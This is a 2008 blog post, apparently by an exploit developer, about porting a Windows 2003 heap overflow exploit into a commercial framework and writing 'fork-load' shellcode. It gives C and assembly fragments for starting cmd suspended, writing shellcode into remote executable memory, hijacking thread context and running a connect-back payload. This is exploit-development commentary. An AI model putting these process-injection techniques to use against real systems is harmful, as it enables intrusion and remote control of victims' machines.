martes, 5 de agosto de 2008

Apology of forking shellcode

*Note: To practice my writing i will start doing random post in english, most of them related with computers.*

I remember back in the time, when Dave was trying to chill-out from a hard day of work he start to do a simple "half and hour" hoolio (In Immunity's slang, hoolio is an exploit for bizarre software, named after -Julio FTP Server-), and so he start do savant. For those who never exploit, it takes a bit more than half-and-hour. Refer to Advance Stack Overflow.


The last thing I did, is fully port the neat exploit that Brett Moore did for Syscan to CANVAS, its a really interesting bug and a good proof of concept for windows 2003 explotation (Since today, we are gonna include it on the Heap overflow trainning). I'm not gonna get into the details since Brett cover them all up, i just wanna state that is a nice bug and with some work it can be exploit it quite reliable. The problem was different this time: Shellcode.

The great problem on shellcode execution is that the heap is screwed by whatever primitive you use, so it will eventually gonna crash on an allocation. It can be fixed, but you will never be 100% sure that you did it correctly, and probably you will end up with a big shellcode.

Our usual response to this problem is -Process Injection-, Bas (also known as The great Bas Alberts) wrote a great shellcode a couple of years ago, which inject mosdef shellcode into whatever process is given and execute the connect back. We tag-team a little bit on this exploit before he left to reduce shellcode size (since I only had around 0x300 bytes).

I did all of this without checking the thread privilege (kids, dont do that at home, we are security professional trained to do such dumb mistakes), so when i run my exploit nothing significant happens.

Since I believe in science, i look for the causes, and this time i found out the worst: I didn't have the SeDebugPrivilige. Usually is disable, and you can easily enable with a couple of lines of assembly, but this time it was not there. In simple words:
Good bye Inject shellcode, Welcome trouble.

Next step, ForkLoad shellcode. We had a template of what is supposed to be fork shellcode, but it was never finished, and so it was my task for the last couple of days. (sheesh, I did all this write up to get into this point).

In 2003 the Last Stage of Delirium group release a paper on win32 shellcode, which between other amazing tricks they talk about a Fork Load shellcode, they made it look simple:

1) Create the process in Suspended Mode

STARTUPINFO si = {0}; PROCESS_INFORMATION pi;
CONTEXT ctx;
CreateProcess(NULL, "cmd", NULL, NULL, 0, CREATE_SUSPENDED, NULL, &si, π);

2) Get Full context of the main thread

ctx.ContextFlags = CONTEXT_FULL;
GetThreadContext( pi.Thread, &ctx);

3) Remote VirtualAllocate and Write our shellcode there.

v = VirtualAllocEx( pi.hProcess, NULL, 0x5000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory( pi.hProcess, v, buf, sizeof(buf), NULL);

4) Make the thread EIP points to our shellcode

ctx.ContextFlags = CONTEXT_FULL;
ctx.Eip = v;
SetThreadContext( pi.hThread, &ctx);

5) Since the thread is in SUSPENDED MODE, resume execution

ResumeThread(pi.hThread);


The shellcode injected will work perfectly, as far as it does simple things. You will have kernel32.dll and ntdll.dll loaded (but not initialized), so depending what shellcode do you might end up on a crash on non-initialized critical section usage or other similar behaviour.

To fix it, we have to do a couple of tweaks. Let me show you some code:

1) You need to distinguished where you are the forking or the forked process, we did that with a simple self-modifying code:

forkentry:
// if this marker is cleared this jmps to forkthis:
// we copy this entire payload over ;)
xorl %eax, %eax
incl %eax
test %eax,%eax
jz forkthis

// start of self modifying muck

// Self modifying code, change the incl for a nop
leal forkentry-getpcloc(%ebp),%ecx
movb $0x90, 2(%ecx) // 2(%ecx) points to the incl %eax

2) CreateProcess in suspended-mode

CreateProcess(NULL, "cmd", NULL, NULL, 0, CREATE_SUSPENDED, NULL, &si, π);

3) Remote VirtualAllocate and Write our shellcode there.

v = VirtualAllocEx( pi.hProcess, NULL, 0x5000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory( pi.hProcess, v, buf, sizeof(buf), NULL);

4) Get Full context of the main thread

ctx.ContextFlags = CONTEXT_FULL;
GetThreadContext( pi.Thread, &ctx);

5) Create a Remote Thread and run it

CreateRemoteThread( hProcess, 0, 0, shellcode, 0, 0,0)

6) Resume the main thread execution of the main thread.

// pi.hThread
pushl %esi
call RESUMETHREAD-getpcloc(%ebp)

7a) If you are forking, exitthread

xorl %eax,%eax
pushl %eax
call EXITTHREAD-getpcloc(%ebp)

7b) If you are forked, sleep for one second to let the main thread initialize everything

kernel32.dll!Sleep( 0x1000)


And that takes around 0x2cd bytes (It can be optimized), including:
- LoadLibrary("WS2_32.dll")
- Resolving WS2_32.dll!wsastartup and calling it
- and including the first-stage mosdef shellcode (socket/connect/recv).


All the kudos for Bas and his recently re-write of our shellcode framework making this smoother experience.

No hay comentarios: